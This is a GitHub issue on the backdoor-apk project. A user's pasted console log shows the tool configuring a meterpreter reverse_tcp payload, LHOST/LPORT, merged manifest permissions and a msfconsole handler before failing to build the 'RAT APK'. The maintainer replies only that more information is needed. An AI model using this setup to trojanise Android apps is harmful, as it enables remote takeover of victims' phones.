### ISSUE TITLE
Failed to generate RAT APK file please solve this error

### ISSUE THREAD

**Issue by usama5** [dana-at-cp/backdoor-apk#129]
[*] Running backdoor-apk.sh v0.2.3 on Sat Mar  3 14:48:41 EST 2018
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3 
[?] Please enter an LHOST value: 192.168.*.*
[?] Please enter an LPORT value: 4444
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[!] Failed to generate RAT APK file

**Comment by dana-at-cp** [comment]
@usama5 Not enough information.
